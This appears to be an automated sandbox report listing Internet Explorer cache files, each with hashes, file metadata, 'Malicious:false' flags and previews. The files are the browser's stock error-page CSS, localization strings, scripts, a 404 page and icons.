                                                                                                                                                                C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\MEEXW4H4\ErrorPageTemplate[2]
                                                                                                                                                                Process:C:\Program Files (x86)\Internet Explorer\iexplore.exe
                                                                                                                                                                File Type:UTF-8 Unicode (with BOM) text, with CRLF line terminators
                                                                                                                                                                Category:dropped
                                                                                                                                                                Size (bytes):2168
                                                                                                                                                                Entropy (8bit):5.207912016937144
                                                                                                                                                                Encrypted:false
                                                                                                                                                                SSDEEP:24:5+j5xU5k5N0ndgvoyeP0yyiyQCDr3nowMVworDtX3orKxWxDnCMA0da+hieyuSQK:5Q5K5k5pvFehWrrarrZIrHd3FIQfOS6
                                                                                                                                                                MD5:F4FE1CB77E758E1BA56B8A8EC20417C5
                                                                                                                                                                SHA1:F4EDA06901EDB98633A686B11D02F4925F827BF0
                                                                                                                                                                SHA-256:8D018639281B33DA8EB3CE0B21D11E1D414E59024C3689F92BE8904EB5779B5F
                                                                                                                                                                SHA-512:62514AB345B6648C5442200A8E9530DFB88A0355E262069E0A694289C39A4A1C06C6143E5961074BFAC219949102A416C09733F24E8468984B96843DC222B436
                                                                                                                                                                Malicious:false
                                                                                                                                                                Preview: .body..{...font-family: "Segoe UI", "verdana", "arial";...background-image: url(background_gradient.jpg);...background-repeat: repeat-x;...background-color: #E8EAEF;...margin-top: 20px;...margin-left: 20px;...color: #575757;..}....body.securityError..{...font-family: "Segoe UI", "verdana" , "Arial";...background-image: url(background_gradient_red.jpg);...background-repeat: repeat-x;...background-color: #E8EAEF;...margin-top: 20px;...margin-left: 20px;..}....body.tabInfo..{...background-image: none;...background-color: #F4F4F4;..}.. ..a..{...color: rgb(19,112,171);.font-size: 1em;...font-weight: normal;...text-decoration: none;...margin-left: 0px;...vertical-align: top;..}....a:link, a:visited..{...color: rgb(19,112,171);...text-decoration: none;...vertical-align: top;..}....a:hover..{...color: rgb(7,74,229);...text-decoration: underline;..}....p..{...font-size: 0.9em;..}.....h1 /* used for Title */..{...color: #4465A2;...font-size: 1.1em;...font-weight: normal;...vertical-align
                                                                                                                                                                C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\MEEXW4H4\background_gradient[1]
                                                                                                                                                                Process:C:\Program Files (x86)\Internet Explorer\iexplore.exe
                                                                                                                                                                File Type:JPEG image data, JFIF standard 1.02, aspect ratio, density 100x100, segment length 16, baseline, precision 8, 1x800, frames 3
                                                                                                                                                                Category:downloaded
                                                                                                                                                                Size (bytes):453
                                                                                                                                                                Entropy (8bit):5.019973044227213
                                                                                                                                                                Encrypted:false
                                                                                                                                                                SSDEEP:6:3llVuiPjlXJYhg5suRd8PImMo23C/kHrJ8yA/NIeYoWg78C/vTFvbKLAh3:V/XPYhiPRd8j7+9LoIrobtHTdbKi
                                                                                                                                                                MD5:20F0110ED5E4E0D5384A496E4880139B
                                                                                                                                                                SHA1:51F5FC61D8BF19100DF0F8AADAA57FCD9C086255
                                                                                                                                                                SHA-256:1471693BE91E53C2640FE7BAEECBC624530B088444222D93F2815DFCE1865D5B
                                                                                                                                                                SHA-512:5F52C117E346111D99D3B642926139178A80B9EC03147C00E27F07AAB47FE38E9319FE983444F3E0E36DEF1E86DD7C56C25E44B14EFDC3F13B45EDEDA064DB5A
                                                                                                                                                                Malicious:false
                                                                                                                                                                IE Cache URL:res://ieframe.dll/background_gradient.jpg
                                                                                                                                                                C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\MEEXW4H4\bullet[1]
                                                                                                                                                                Process:C:\Program Files (x86)\Internet Explorer\iexplore.exe
                                                                                                                                                                File Type:PNG image data, 15 x 15, 8-bit colormap, non-interlaced
                                                                                                                                                                Category:dropped
                                                                                                                                                                Size (bytes):447
                                                                                                                                                                Entropy (8bit):7.304718288205936
                                                                                                                                                                Encrypted:false
                                                                                                                                                                SSDEEP:12:6v/71Cyt/JNTWxGdr+kZDWO7+4dKIv0b1GKuxu+R:/yBJNTqsSk9BTwE05su+R
                                                                                                                                                                MD5:26F971D87CA00E23BD2D064524AEF838
                                                                                                                                                                SHA1:7440BEFF2F4F8FABC9315608A13BF26CABAD27D9
                                                                                                                                                                SHA-256:1D8E5FD3C1FD384C0A7507E7283C7FE8F65015E521B84569132A7EABEDC9D41D
                                                                                                                                                                SHA-512:C62EB51BE301BB96C80539D66A73CD17CA2021D5D816233853A37DB72E04050271E581CC99652F3D8469B390003CA6C62DAD2A9D57164C620B7777AE99AA1B15
                                                                                                                                                                Malicious:false
                                                                                                                                                                C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\MEEXW4H4\down[1]
                                                                                                                                                                Process:C:\Program Files (x86)\Internet Explorer\iexplore.exe
                                                                                                                                                                File Type:PNG image data, 15 x 15, 8-bit colormap, non-interlaced
                                                                                                                                                                Category:dropped
                                                                                                                                                                Size (bytes):748
                                                                                                                                                                Entropy (8bit):7.249606135668305
                                                                                                                                                                Encrypted:false
                                                                                                                                                                SSDEEP:12:6v/7/2QeZ7HVJ6o6yiq1p4tSQfAVFcm6R2HkZuU4fB4CsY4NJlrvMezoW2uONroc:GeZ6oLiqkbDuU4fqzTrvMeBBlE
                                                                                                                                                                MD5:C4F558C4C8B56858F15C09037CD6625A
                                                                                                                                                                SHA1:EE497CC061D6A7A59BB66DEFEA65F9A8145BA240
                                                                                                                                                                SHA-256:39E7DE847C9F731EAA72338AD9053217B957859DE27B50B6474EC42971530781
                                                                                                                                                                SHA-512:D60353D3FBEA2992D96795BA30B20727B022B9164B2094B922921D33CA7CE1634713693AC191F8F5708954544F7648F4840BCD5B62CB6A032EF292A8B0E52A44
                                                                                                                                                                Malicious:false
                                                                                                                                                                C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\MEEXW4H4\errorPageStrings[1]
                                                                                                                                                                Process:C:\Program Files (x86)\Internet Explorer\iexplore.exe
                                                                                                                                                                File Type:UTF-8 Unicode (with BOM) text, with CRLF line terminators
                                                                                                                                                                Category:dropped
                                                                                                                                                                Size (bytes):4720
                                                                                                                                                                Entropy (8bit):5.164796203267696
                                                                                                                                                                Encrypted:false
                                                                                                                                                                SSDEEP:96:z9UUiqRxqH211CUIRgRLnRynjZbRXkRPRk6C87Apsat/5/+mhPcF+5g+mOQb7A9o:JsUOG1yNlX6ZzWpHOWLia16Cb7bk
                                                                                                                                                                MD5:D65EC06F21C379C87040B83CC1ABAC6B
                                                                                                                                                                SHA1:208D0A0BB775661758394BE7E4AFB18357E46C8B
                                                                                                                                                                SHA-256:A1270E90CEA31B46432EC44731BF4400D22B38EB2855326BF934FE8F1B169A4F
                                                                                                                                                                SHA-512:8A166D26B49A5D95AEA49BC649E5EA58786A2191F4D2ADAC6F5FBB7523940CE4482D6A2502AA870A931224F215CB2010A8C9B99A2C1820150E4D365CAB28299E
                                                                                                                                                                Malicious:false
                                                                                                                                                                Preview: .//Split out for localization...var L_GOBACK_TEXT = "Go back to the previous page.";..var L_REFRESH_TEXT = "Refresh the page.";..var L_MOREINFO_TEXT = "More information";..var L_OFFLINE_USERS_TEXT = "For offline users";..var L_RELOAD_TEXT = "Retype the address.";..var L_HIDE_HOTKEYS_TEXT = "Hide tab shortcuts";..var L_SHOW_HOTKEYS_TEXT = "Show more tab shortcuts";..var L_CONNECTION_OFF_TEXT = "You are not connected to the Internet. Check your Internet connection.";..var L_CONNECTION_ON_TEXT = "It appears you are connected to the Internet, but you might want to try to reconnect to the Internet.";....//used by invalidcert.js and hstscerterror.js..var L_CertUnknownCA_TEXT = "Your PC doesn\u2019t trust this website\u2019s security certificate.";..var L_CertExpired_TEXT = "The website\u2019s security certificate is not yet valid or has expired.";..var L_CertCNMismatch_TEXT = "The hostname in the website\u2019s security certificate differs from the website you are trying to visit.";..var L
                                                                                                                                                                C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\MEEXW4H4\errorPageStrings[2]
                                                                                                                                                                Process:C:\Program Files (x86)\Internet Explorer\iexplore.exe
                                                                                                                                                                File Type:UTF-8 Unicode (with BOM) text, with CRLF line terminators
                                                                                                                                                                Category:downloaded
                                                                                                                                                                Size (bytes):4720
                                                                                                                                                                Entropy (8bit):5.164796203267696
                                                                                                                                                                Encrypted:false
                                                                                                                                                                SSDEEP:96:z9UUiqRxqH211CUIRgRLnRynjZbRXkRPRk6C87Apsat/5/+mhPcF+5g+mOQb7A9o:JsUOG1yNlX6ZzWpHOWLia16Cb7bk
                                                                                                                                                                MD5:D65EC06F21C379C87040B83CC1ABAC6B
                                                                                                                                                                SHA1:208D0A0BB775661758394BE7E4AFB18357E46C8B
                                                                                                                                                                SHA-256:A1270E90CEA31B46432EC44731BF4400D22B38EB2855326BF934FE8F1B169A4F
                                                                                                                                                                SHA-512:8A166D26B49A5D95AEA49BC649E5EA58786A2191F4D2ADAC6F5FBB7523940CE4482D6A2502AA870A931224F215CB2010A8C9B99A2C1820150E4D365CAB28299E
                                                                                                                                                                Malicious:false
                                                                                                                                                                IE Cache URL:res://ieframe.dll/errorPageStrings.js
                                                                                                                                                                Preview: .//Split out for localization...var L_GOBACK_TEXT = "Go back to the previous page.";..var L_REFRESH_TEXT = "Refresh the page.";..var L_MOREINFO_TEXT = "More information";..var L_OFFLINE_USERS_TEXT = "For offline users";..var L_RELOAD_TEXT = "Retype the address.";..var L_HIDE_HOTKEYS_TEXT = "Hide tab shortcuts";..var L_SHOW_HOTKEYS_TEXT = "Show more tab shortcuts";..var L_CONNECTION_OFF_TEXT = "You are not connected to the Internet. Check your Internet connection.";..var L_CONNECTION_ON_TEXT = "It appears you are connected to the Internet, but you might want to try to reconnect to the Internet.";....//used by invalidcert.js and hstscerterror.js..var L_CertUnknownCA_TEXT = "Your PC doesn\u2019t trust this website\u2019s security certificate.";..var L_CertExpired_TEXT = "The website\u2019s security certificate is not yet valid or has expired.";..var L_CertCNMismatch_TEXT = "The hostname in the website\u2019s security certificate differs from the website you are trying to visit.";..var L
                                                                                                                                                                C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\MEEXW4H4\httpErrorPagesScripts[1]
                                                                                                                                                                Process:C:\Program Files (x86)\Internet Explorer\iexplore.exe
                                                                                                                                                                File Type:UTF-8 Unicode (with BOM) text, with CRLF line terminators
                                                                                                                                                                Category:downloaded
                                                                                                                                                                Size (bytes):12105
                                                                                                                                                                Entropy (8bit):5.451485481468043
                                                                                                                                                                Encrypted:false
                                                                                                                                                                SSDEEP:192:x20iniOciwd1BtvjrG8tAGGGVWnvyJVUrUiki3ayimi5ezLCvJG1gwm3z:xPini/i+1Btvjy815ZVUwiki3ayimi5f
                                                                                                                                                                MD5:9234071287E637F85D721463C488704C
                                                                                                                                                                SHA1:CCA09B1E0FBA38BA29D3972ED8DCECEFDEF8C152
                                                                                                                                                                SHA-256:65CC039890C7CEB927CE40F6F199D74E49B8058C3F8A6E22E8F916AD90EA8649
                                                                                                                                                                SHA-512:87D691987E7A2F69AD8605F35F94241AB7E68AD4F55AD384F1F0D40DC59FFD1432C758123661EE39443D624C881B01DCD228A67AFB8700FE5E66FC794A6C0384
                                                                                                                                                                Malicious:false
                                                                                                                                                                IE Cache URL:res://ieframe.dll/httpErrorPagesScripts.js
                                                                                                                                                                Preview: ...function isExternalUrlSafeForNavigation(urlStr)..{..var regEx = new RegExp("^(http(s?)|ftp|file)://", "i");..return regEx.exec(urlStr);..}..function clickRefresh()..{..var location = window.location.href;..var poundIndex = location.indexOf('#');..if (poundIndex != -1 && poundIndex+1 < location.length && isExternalUrlSafeForNavigation(location.substring(poundIndex+1)))..{..window.location.replace(location.substring(poundIndex+1));..}..}..function navCancelInit()..{..var location = window.location.href;..var poundIndex = location.indexOf('#');..if (poundIndex != -1 && poundIndex+1 < location.length && isExternalUrlSafeForNavigation(location.substring(poundIndex+1)))..{..var bElement = document.createElement("A");..bElement.innerText = L_REFRESH_TEXT;..bElement.href = 'javascript:clickRefresh()';..navCancelContainer.appendChild(bElement);..}..else..{..var textNode = document.createTextNode(L_RELOAD_TEXT);..navCancelContainer.appendChild(textNode);..}..}..function getDisplayValue(elem
                                                                                                                                                                C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\MEEXW4H4\http_404[1]
                                                                                                                                                                Process:C:\Program Files (x86)\Internet Explorer\iexplore.exe
                                                                                                                                                                File Type:HTML document, UTF-8 Unicode (with BOM) text, with very long lines, with CRLF line terminators
                                                                                                                                                                Category:dropped
                                                                                                                                                                Size (bytes):6495
                                                                                                                                                                Entropy (8bit):3.8998802417135856
                                                                                                                                                                Encrypted:false
                                                                                                                                                                SSDEEP:48:up4d0yV4VkBXvLutC5N9J/1a5TI7kZ3GUXn3GFa7K083GJehBu01kptk7KwyBwpM:uKp6yN9JaKktZX36a7x05hwW7RM
                                                                                                                                                                MD5:F65C729DC2D457B7A1093813F1253192
                                                                                                                                                                SHA1:5006C9B50108CF582BE308411B157574E5A893FC
                                                                                                                                                                SHA-256:B82BFB6FA37FD5D56AC7C00536F150C0F244C81F1FC2D4FEFBBDC5E175C71B4F
                                                                                                                                                                SHA-512:717AFF18F105F342103D36270D642CC17BD9921FF0DBC87E3E3C2D897F490F4ECFAB29CF998D6D99C4951C3EABB356FE759C3483A33704CE9FCC1F546EBCBBC7
                                                                                                                                                                Malicious:false
                                                                                                                                                                Preview: .<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN" "http://www.w3.org/TR/html4/loose.dtd">....<html dir="ltr">.... <head>.. <link rel="stylesheet" type="text/css" href="ErrorPageTemplate.css">.... <meta http-equiv="Content-Type" content="text/html; charset=UTF-8">.... <title>HTTP 404 Not Found</title>.... <script src="errorPageStrings.js" language="javascript" type="text/javascript">.. </script>.. <script src="httpErrorPagesScripts.js" language="javascript" type="text/javascript">.. </script>.. </head>.... <body onLoad="javascript:initHomepage(); expandCollapse('infoBlockID', true); initGoBack(); initMoreInfo('infoBlockID');">.... <table width="730" cellpadding="0" cellspacing="0" border="0">.... Error title -->.. <tr>.. <td id="infoIconAlign" width="60" align="left" valign="top" rowspan="2">.. <img src="info_48.png" id="infoIcon" alt="Info icon">..
                                                                                                                                                                C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\MEEXW4H4\http_404[2]
                                                                                                                                                                Process:C:\Program Files (x86)\Internet Explorer\iexplore.exe
                                                                                                                                                                File Type:HTML document, UTF-8 Unicode (with BOM) text, with very long lines, with CRLF line terminators
                                                                                                                                                                Category:dropped
                                                                                                                                                                Size (bytes):6495
                                                                                                                                                                Entropy (8bit):3.8998802417135856
                                                                                                                                                                Encrypted:false
                                                                                                                                                                SSDEEP:48:up4d0yV4VkBXvLutC5N9J/1a5TI7kZ3GUXn3GFa7K083GJehBu01kptk7KwyBwpM:uKp6yN9JaKktZX36a7x05hwW7RM
                                                                                                                                                                MD5:F65C729DC2D457B7A1093813F1253192
                                                                                                                                                                SHA1:5006C9B50108CF582BE308411B157574E5A893FC
                                                                                                                                                                SHA-256:B82BFB6FA37FD5D56AC7C00536F150C0F244C81F1FC2D4FEFBBDC5E175C71B4F
                                                                                                                                                                SHA-512:717AFF18F105F342103D36270D642CC17BD9921FF0DBC87E3E3C2D897F490F4ECFAB29CF998D6D99C4951C3EABB356FE759C3483A33704CE9FCC1F546EBCBBC7
                                                                                                                                                                Malicious:false
                                                                                                                                                                Preview: .<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN" "http://www.w3.org/TR/html4/loose.dtd">....<html dir="ltr">.... <head>.. <link rel="stylesheet" type="text/css" href="ErrorPageTemplate.css">.... <meta http-equiv="Content-Type" content="text/html; charset=UTF-8">.... <title>HTTP 404 Not Found</title>.... <script src="errorPageStrings.js" language="javascript" type="text/javascript">.. </script>.. <script src="httpErrorPagesScripts.js" language="javascript" type="text/javascript">.. </script>.. </head>.... <body onLoad="javascript:initHomepage(); expandCollapse('infoBlockID', true); initGoBack(); initMoreInfo('infoBlockID');">.... <table width="730" cellpadding="0" cellspacing="0" border="0">.... Error title -->.. <tr>.. <td id="infoIconAlign" width="60" align="left" valign="top" rowspan="2">.. <img src="info_48.png" id="infoIcon" alt="Info icon">..
                                                                                                                                                                C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\MEEXW4H4\info_48[1]
                                                                                                                                                                Process:C:\Program Files (x86)\Internet Explorer\iexplore.exe
                                                                                                                                                                File Type:PNG image data, 47 x 48, 8-bit/color RGBA, non-interlaced
                                                                                                                                                                Category:dropped
                                                                                                                                                                Size (bytes):4113
                                                                                                                                                                Entropy (8bit):7.9370830126943375
                                                                                                                                                                Encrypted:false
                                                                                                                                                                SSDEEP:96:WNTJL8szf79M8FUjE39KJoUUuJPnvmKacs6Uq7qDMj1XPL:WNrzFoQSJPnvzs6rL
                                                                                                                                                                MD5:5565250FCC163AA3A79F0B746416CE69
                                                                                                                                                                SHA1:B97CC66471FCDEE07D0EE36C7FB03F342C231F8F
                                                                                                                                                                SHA-256:51129C6C98A82EA491F89857C31146ECEC14C4AF184517450A7A20C699C84859
                                                                                                                                                                SHA-512:E60EA153B0FECE4D311769391D3B763B14B9A140105A36A13DAD23C2906735EAAB9092236DEB8C68EF078E8864D6E288BEF7EF1731C1E9F1AD9B0170B95AC134
                                                                                                                                                                Malicious:false
                                                                                                                                                                C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\PSUEOSZZ\background_gradient[1]
                                                                                                                                                                Process:C:\Program Files (x86)\Internet Explorer\iexplore.exe
                                                                                                                                                                File Type:JPEG image data, JFIF standard 1.02, aspect ratio, density 100x100, segment length 16, baseline, precision 8, 1x800, frames 3
                                                                                                                                                                Category:dropped
                                                                                                                                                                Size (bytes):453
                                                                                                                                                                Entropy (8bit):5.019973044227213
                                                                                                                                                                Encrypted:false
                                                                                                                                                                SSDEEP:6:3llVuiPjlXJYhg5suRd8PImMo23C/kHrJ8yA/NIeYoWg78C/vTFvbKLAh3:V/XPYhiPRd8j7+9LoIrobtHTdbKi
                                                                                                                                                                MD5:20F0110ED5E4E0D5384A496E4880139B
                                                                                                                                                                SHA1:51F5FC61D8BF19100DF0F8AADAA57FCD9C086255
                                                                                                                                                                SHA-256:1471693BE91E53C2640FE7BAEECBC624530B088444222D93F2815DFCE1865D5B
                                                                                                                                                                SHA-512:5F52C117E346111D99D3B642926139178A80B9EC03147C00E27F07AAB47FE38E9319FE983444F3E0E36DEF1E86DD7C56C25E44B14EFDC3F13B45EDEDA064DB5A
                                                                                                                                                                Malicious:false
                                                                                                                                                                C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\PSUEOSZZ\bullet[1]
                                                                                                                                                                Process:C:\Program Files (x86)\Internet Explorer\iexplore.exe
                                                                                                                                                                File Type:PNG image data, 15 x 15, 8-bit colormap, non-interlaced
                                                                                                                                                                Category:downloaded
                                                                                                                                                                Size (bytes):447
                                                                                                                                                                Entropy (8bit):7.304718288205936
                                                                                                                                                                Encrypted:false
                                                                                                                                                                SSDEEP:12:6v/71Cyt/JNTWxGdr+kZDWO7+4dKIv0b1GKuxu+R:/yBJNTqsSk9BTwE05su+R
                                                                                                                                                                MD5:26F971D87CA00E23BD2D064524AEF838
                                                                                                                                                                SHA1:7440BEFF2F4F8FABC9315608A13BF26CABAD27D9
                                                                                                                                                                SHA-256:1D8E5FD3C1FD384C0A7507E7283C7FE8F65015E521B84569132A7EABEDC9D41D
                                                                                                                                                                SHA-512:C62EB51BE301BB96C80539D66A73CD17CA2021D5D816233853A37DB72E04050271E581CC99652F3D8469B390003CA6C62DAD2A9D57164C620B7777AE99AA1B15
                                                                                                                                                                Malicious:false
                                                                                                                                                                IE Cache URL:res://ieframe.dll/bullet.png
                                                                                                                                                                C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\PSUEOSZZ\down[1]
                                                                                                                                                                Process:C:\Program Files (x86)\Internet Explorer\iexplore.exe
                                                                                                                                                                File Type:PNG image data, 15 x 15, 8-bit colormap, non-interlaced
                                                                                                                                                                Category:dropped
                                                                                                                                                                Size (bytes):748
                                                                                                                                                                Entropy (8bit):7.249606135668305
                                                                                                                                                                Encrypted:false
                                                                                                                                                                SSDEEP:12:6v/7/2QeZ7HVJ6o6yiq1p4tSQfAVFcm6R2HkZuU4fB4CsY4NJlrvMezoW2uONroc:GeZ6oLiqkbDuU4fqzTrvMeBBlE
                                                                                                                                                                MD5:C4F558C4C8B56858F15C09037CD6625A
                                                                                                                                                                SHA1:EE497CC061D6A7A59BB66DEFEA65F9A8145BA240
                                                                                                                                                                SHA-256:39E7DE847C9F731EAA72338AD9053217B957859DE27B50B6474EC42971530781
                                                                                                                                                                SHA-512:D60353D3FBEA2992D96795BA30B20727B022B9164B2094B922921D33CA7CE1634713693AC191F8F5708954544F7648F4840BCD5B62CB6A032EF292A8B0E52A44
                                                                                                                                                                Malicious:false
                                                                                                                                                                C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\PSUEOSZZ\errorPageStrings[1]
                                                                                                                                                                Process:C:\Program Files (x86)\Internet Explorer\iexplore.exe
                                                                                                                                                                File Type:UTF-8 Unicode (with BOM) text, with CRLF line terminators
                                                                                                                                                                Category:dropped
                                                                                                                                                                Size (bytes):4720
                                                                                                                                                                Entropy (8bit):5.164796203267696
                                                                                                                                                                Encrypted:false
                                                                                                                                                                SSDEEP:96:z9UUiqRxqH211CUIRgRLnRynjZbRXkRPRk6C87Apsat/5/+mhPcF+5g+mOQb7A9o:JsUOG1yNlX6ZzWpHOWLia16Cb7bk
                                                                                                                                                                MD5:D65EC06F21C379C87040B83CC1ABAC6B
                                                                                                                                                                SHA1:208D0A0BB775661758394BE7E4AFB18357E46C8B
                                                                                                                                                                SHA-256:A1270E90CEA31B46432EC44731BF4400D22B38EB2855326BF934FE8F1B169A4F
                                                                                                                                                                SHA-512:8A166D26B49A5D95AEA49BC649E5EA58786A2191F4D2ADAC6F5FBB7523940CE4482D6A2502AA870A931224F215CB2010A8C9B99A2C1820150E4D365CAB28299E
                                                                                                                                                                Malicious:false
                                                                                                                                                                Preview: .//Split out for localization...var L_GOBACK_TEXT = "Go back to the previous page.";..var L_REFRESH_TEXT = "Refresh the page.";..var L_MOREINFO_TEXT = "More information";..var L_OFFLINE_USERS_TEXT = "For offline users";..var L_RELOAD_TEXT = "Retype the address.";..var L_HIDE_HOTKEYS_TEXT = "Hide tab shortcuts";..var L_SHOW_HOTKEYS_TEXT = "Show more tab shortcuts";..var L_CONNECTION_OFF_TEXT = "You are not connected to the Internet. Check your Internet connection.";..var L_CONNECTION_ON_TEXT = "It appears you are connected to the Internet, but you might want to try to reconnect to the Internet.";....//used by invalidcert.js and hstscerterror.js..var L_CertUnknownCA_TEXT = "Your PC doesn\u2019t trust this website\u2019s security certificate.";..var L_CertExpired_TEXT = "The website\u2019s security certificate is not yet valid or has expired.";..var L_CertCNMismatch_TEXT = "The hostname in the website\u2019s security certificate differs from the website you are trying to visit.";..var L
                                                                                                                                                                C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\PSUEOSZZ\httpErrorPagesScripts[1]
                                                                                                                                                                Process:C:\Program Files (x86)\Internet Explorer\iexplore.exe
                                                                                                                                                                File Type:UTF-8 Unicode (with BOM) text, with CRLF line terminators
                                                                                                                                                                Category:dropped
                                                                                                                                                                Size (bytes):12105
                                                                                                                                                                Entropy (8bit):5.451485481468043
                                                                                                                                                                Encrypted:false
                                                                                                                                                                SSDEEP:192:x20iniOciwd1BtvjrG8tAGGGVWnvyJVUrUiki3ayimi5ezLCvJG1gwm3z:xPini/i+1Btvjy815ZVUwiki3ayimi5f
                                                                                                                                                                MD5:9234071287E637F85D721463C488704C
                                                                                                                                                                SHA1:CCA09B1E0FBA38BA29D3972ED8DCECEFDEF8C152
                                                                                                                                                                SHA-256:65CC039890C7CEB927CE40F6F199D74E49B8058C3F8A6E22E8F916AD90EA8649
                                                                                                                                                                SHA-512:87D691987E7A2F69AD8605F35F94241AB7E68AD4F55AD384F1F0D40DC59FFD1432C758123661EE39443D624C881B01DCD228A67AFB8700FE5E66FC794A6C0384
                                                                                                                                                                Malicious:false
                                                                                                                                                                Preview: ...function isExternalUrlSafeForNavigation(urlStr)..{..var regEx = new RegExp("^(http(s?)|ftp|file)://", "i");..return regEx.exec(urlStr);..}..function clickRefresh()..{..var location = window.location.href;..var poundIndex = location.indexOf('#');..if (poundIndex != -1 && poundIndex+1 < location.length && isExternalUrlSafeForNavigation(location.substring(poundIndex+1)))..{..window.location.replace(location.substring(poundIndex+1));..}..}..function navCancelInit()..{..var location = window.location.href;..var poundIndex = location.indexOf('#');..if (poundIndex != -1 && poundIndex+1 < location.length && isExternalUrlSafeForNavigation(location.substring(poundIndex+1)))..{..var bElement = document.createElement("A");..bElement.innerText = L_REFRESH_TEXT;..bElement.href = 'javascript:clickRefresh()';..navCancelContainer.appendChild(bElement);..}..else..{..var textNode = document.createTextNode(L_RELOAD_TEXT);..navCancelContainer.appendChild(textNode);..}..}..function getDisplayValue(elem
                                                                                                                                                                C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\PSUEOSZZ\http_404[1]
                                                                                                                                                                Process:C:\Program Files (x86)\Internet Explorer\iexplore.exe
                                                                                                                                                                File Type:HTML document, UTF-8 Unicode (with BOM) text, with very long lines, with CRLF line terminators
                                                                                                                                                                Category:downloaded
                                                                                                                                                                Size (bytes):6495
                                                                                                                                                                Entropy (8bit):3.8998802417135856
                                                                                                                                                                Encrypted:false
                                                                                                                                                                SSDEEP:48:up4d0yV4VkBXvLutC5N9J/1a5TI7kZ3GUXn3GFa7K083GJehBu01kptk7KwyBwpM:uKp6yN9JaKktZX36a7x05hwW7RM
                                                                                                                                                                MD5:F65C729DC2D457B7A1093813F1253192
                                                                                                                                                                SHA1:5006C9B50108CF582BE308411B157574E5A893FC
                                                                                                                                                                SHA-256:B82BFB6FA37FD5D56AC7C00536F150C0F244C81F1FC2D4FEFBBDC5E175C71B4F
                                                                                                                                                                SHA-512:717AFF18F105F342103D36270D642CC17BD9921FF0DBC87E3E3C2D897F490F4ECFAB29CF998D6D99C4951C3EABB356FE759C3483A33704CE9FCC1F546EBCBBC7
                                                                                                                                                                Malicious:false
                                                                                                                                                                IE Cache URL:res://ieframe.dll/http_404.htm
                                                                                                                                                                Preview: .<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN" "http://www.w3.org/TR/html4/loose.dtd">....<html dir="ltr">.... <head>.. <link rel="stylesheet" type="text/css" href="ErrorPageTemplate.css">.... <meta http-equiv="Content-Type" content="text/html; charset=UTF-8">.... <title>HTTP 404 Not Found</title>.... <script src="errorPageStrings.js" language="javascript" type="text/javascript">.. </script>.. <script src="httpErrorPagesScripts.js" language="javascript" type="text/javascript">.. </script>.. </head>.... <body onLoad="javascript:initHomepage(); expandCollapse('infoBlockID', true); initGoBack(); initMoreInfo('infoBlockID');">.... <table width="730" cellpadding="0" cellspacing="0" border="0">.... Error title -->.. <tr>.. <td id="infoIconAlign" width="60" align="left" valign="top" rowspan="2">.. <img src="info_48.png" id="infoIcon" alt="Info icon">..
                                                                                                                                                                C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\PSUEOSZZ\info_48[1]
                                                                                                                                                                Process:C:\Program Files (x86)\Internet Explorer\iexplore.exe
                                                                                                                                                                File Type:PNG image data, 47 x 48, 8-bit/color RGBA, non-interlaced
                                                                                                                                                                Category:dropped
                                                                                                                                                                Size (bytes):4113
                                                                                                                                                                Entropy (8bit):7.9370830126943375
                                                                                                                                                                Encrypted:false
                                                                                                                                                                SSDEEP:96:WNTJL8szf79M8FUjE39KJoUUuJPnvmKacs6Uq7qDMj1XPL:WNrzFoQSJPnvzs6rL
                                                                                                                                                                MD5:5565250FCC163AA3A79F0B746416CE69
                                                                                                                                                                SHA1:B97CC66471FCDEE07D0EE36C7FB03F342C231F8F
                                                                                                                                                                SHA-256:51129C6C98A82EA491F89857C31146ECEC14C4AF184517450A7A20C699C84859
                                                                                                                                                                SHA-512:E60EA153B0FECE4D311769391D3B763B14B9A140105A36A13DAD23C2906735EAAB9092236DEB8C68EF078E8864D6E288BEF7EF1731C1E9F1AD9B0170B95AC134
                                                                                                                                                                Malicious:false
                                                                                                                                                                C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\WJ8I2OL4\ErrorPageTemplate[1]
                                                                                                                                                                Process:C:\Program Files (x86)\Internet Explorer\iexplore.exe
                                                                                                                                                                File Type:UTF-8 Unicode (with BOM) text, with CRLF line terminators
                                                                                                                                                                Category:downloaded
                                                                                                                                                                Size (bytes):2168
                                                                                                                                                                Entropy (8bit):5.207912016937144
                                                                                                                                                                Encrypted:false
                                                                                                                                                                SSDEEP:24:5+j5xU5k5N0ndgvoyeP0yyiyQCDr3nowMVworDtX3orKxWxDnCMA0da+hieyuSQK:5Q5K5k5pvFehWrrarrZIrHd3FIQfOS6
                                                                                                                                                                MD5:F4FE1CB77E758E1BA56B8A8EC20417C5
                                                                                                                                                                SHA1:F4EDA06901EDB98633A686B11D02F4925F827BF0
                                                                                                                                                                SHA-256:8D018639281B33DA8EB3CE0B21D11E1D414E59024C3689F92BE8904EB5779B5F
                                                                                                                                                                SHA-512:62514AB345B6648C5442200A8E9530DFB88A0355E262069E0A694289C39A4A1C06C6143E5961074BFAC219949102A416C09733F24E8468984B96843DC222B436
                                                                                                                                                                Malicious:false
                                                                                                                                                                IE Cache URL:res://ieframe.dll/ErrorPageTemplate.css
